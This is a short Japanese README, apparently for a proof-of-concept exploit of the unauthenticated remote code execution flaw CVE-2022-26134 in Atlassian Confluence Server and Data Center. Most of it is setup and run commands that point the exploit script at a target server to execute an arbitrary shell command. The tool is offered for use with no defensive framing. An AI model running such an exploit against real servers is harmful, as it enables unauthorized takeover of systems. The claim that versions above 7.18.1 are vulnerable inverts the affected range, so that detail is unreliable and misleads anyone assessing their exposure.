
アトラシアンのConfluence ServerおよびData Centerエディション(脆弱なバージョン > 7.18.1)
2022年5月30日、Volexityという組織が、AtlassianのConfluence ServerおよびData Centerエディション(脆弱バージョン > 7.18.1)において、認証不要のRCE脆弱性(NISTスコア9.8)を特定しました。
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2022-26134.py http://xxx.xxx.xxx.xxx:8090/ "id"